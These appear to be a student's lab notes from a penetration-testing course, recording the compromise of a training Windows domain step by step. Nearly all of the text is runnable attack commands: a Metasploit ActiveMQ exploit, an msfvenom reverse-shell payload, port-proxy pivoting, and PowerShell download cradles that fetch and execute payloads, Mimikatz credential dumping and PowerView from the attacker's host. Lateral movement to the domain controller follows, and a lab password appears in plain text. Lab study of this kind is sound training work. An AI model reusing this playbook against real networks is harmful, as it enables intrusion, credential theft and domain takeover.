set rport 8443 = that is the port that we access the apache page
run
// we should get a shell back

upgrade the shell to a meterpreter shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.100.11.101 LPORT=4444 -f exe > /tmp/payload.exe

python3 -m http.server 8000

lets add another port in the portproxy

use post/windows/manage/portproxy

set CONNECT_ADDRESS <kali ip>
set CONNECT_PORT 8000
set LOCAL_ADDRESS 10.100.11.101 = its the first host we compromise.
set LOCAL_PORT 8000
set session 1
run

[!NOTE] cool

set a handler

jobs -K = to kill all jobs opens
use exploit/multi/handler
set options
set lport 4444 = the port that we opened with portproxy
exploit -j

in the Java shell:

powershell -c iex (New-Object Net.WebClient).DownloadFile('http://10.100.11.101:8000/payload.exe', 'C:\Windows\Temp\payload.exe')

// then execute it C:\windows\temp\payload.exe

we should gain a shell back from meterpreter from our handler

Obtain Hashes using Mimikatz

in Java session:

	powershell -c iex (New-Object Net.WebClient).DownloadString('http://10.100.11.101:8000/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

of course, make sure the Invoke-Mimikatz is in the python web host directory. this cradle will download and execute the Invoke-Mimikatz we should get hashes back

Extra [+] PSINJECT

// PSINJECT is the same as migrate from metasploit but its from Empire

interact <agent number>
shell ps

searchmodule psinject
usemodule management/psinject
set Agent <agent number>
set Listener http
set ProcId <the PID from the process you wanna migrate, in this case lsass>
execute

this should open a new agent (session) just type agents to visualize

Lab 2 Powershell for post-exploitation and Lateral Movement

targets network: 172.17.80.0/24

myip: 175.13.80.5

gather information

sudo nmap -sn -oG - 172.17.80.* | awk '/Up$/ {print $2}'
fping -a -g 172.17.80.0/24 2>/dev/null > hostsup

- 172.17.80.1
- 172.17.80.100

Exploit Apache ActiveMQ

// we found that port 8161 is running Apache ActiveMQ, so I searched For that version in metasploit exploit(multi/http/apache_activemq_upload_jsp) and got a shell.

// ip discovered: 10.100.11.101

in Meterpreter session:

run autoroute -s 10.100.11.0/24

Token Impersonation

use incognito list_tokens -u impersonate_token ELS-CHILD\local_admin

Sending PowerView to the target

open a web host with python then send and execute the file:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://175.13.80.5:8000/PowerView.ps1'); Get-NetDomainController"

Results

Forest                     : eLS.local
CurrentTime                : 1/8/2022 11:36:28 PM
HighestCommittedUsn        : 209035
OSVersion                  : Windows Server 2012 R2 Standard
Roles                      : {PdcRole, RidRole, InfrastructureRole}
Domain                     : els-child.eLS.local
IPAddress                  : 10.100.10.253
SiteName                   : Default-First-Site-Name
SyncFromAllServersCallback : 
InboundConnections         : {18be55e6-23fd-4162-ab64-6b2cf34040e5}
OutboundConnections        : {e308ece2-539f-4f7a-9fc2-fee4e5adfd31}
Name                       : child-dc01.els-child.eLS.local
Partitions                 : {CN=Configuration,DC=eLS,DC=local, CN=Schema,CN=Co
                             nfiguration,DC=eLS,DC=local, DC=ForestDnsZones,DC=
                             eLS,DC=local, DC=els-child,DC=eLS,DC=local...}

[+] // DC els.child.eLS.local 10.100.10.253

local_admin is a local administrator of the domain controller

powershell "IEX (New-Object Net.WebClient).DownloadString('http://175.13.80.5:8000/PowerView.ps1'); Find-LocalAdminAccess"

going back to SYSTEM

ctrl+z the shell
in Meterpreter:
	rev2self

search for files

search -f *.txt

found a file uat_teste_account.txt with credentials:
	Username: ELS-CHILD\local_admin
	Password: P@ssw0rd123

arp scanner

use post/windows/gather/arp_scanner set options // we found a new ip 10.11.100.101

set a proxy to the internal network

use post/windows/manage/portproxy

set CONNECT_ADDRESS <kali ip>
set CONNECT_PORT 4444
set LOCAL_ADDRESS 10.100.11.101
set LOCAL_PORT 4444 
set SESSION 1
run

powershell_remoting to execute commands in that internal network

use exploit/windows/local/powershell_remoting

set SMBUSER local_admin
set SMBPASS P@ssw0rd123
set SMBDOMAIN ELS-CHILD
set RHOSTS 10.100.11.100
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.100.11.101
set LPORT 4444
exploit -j

we should get a shell back from the win10 machine

to execute commands on the DC, we just need to modify the powershell_remoting

set SESSION 2 = the win10 machine
set RHOSTS 10.100.10.253 = the IP of DC
exploit -j

now we should have a shell from the DC

download cradles used

powershell "iex (New-Object Net.WebClient).DownloadFile('http://10.100.11.101:8000/payload.exe', 'C:\Windows\Temp\payload.exe')"

powershell "IEX (New-Object Net.WebClient).DownloadString('http://175.13.80.5:8000/shell.exe')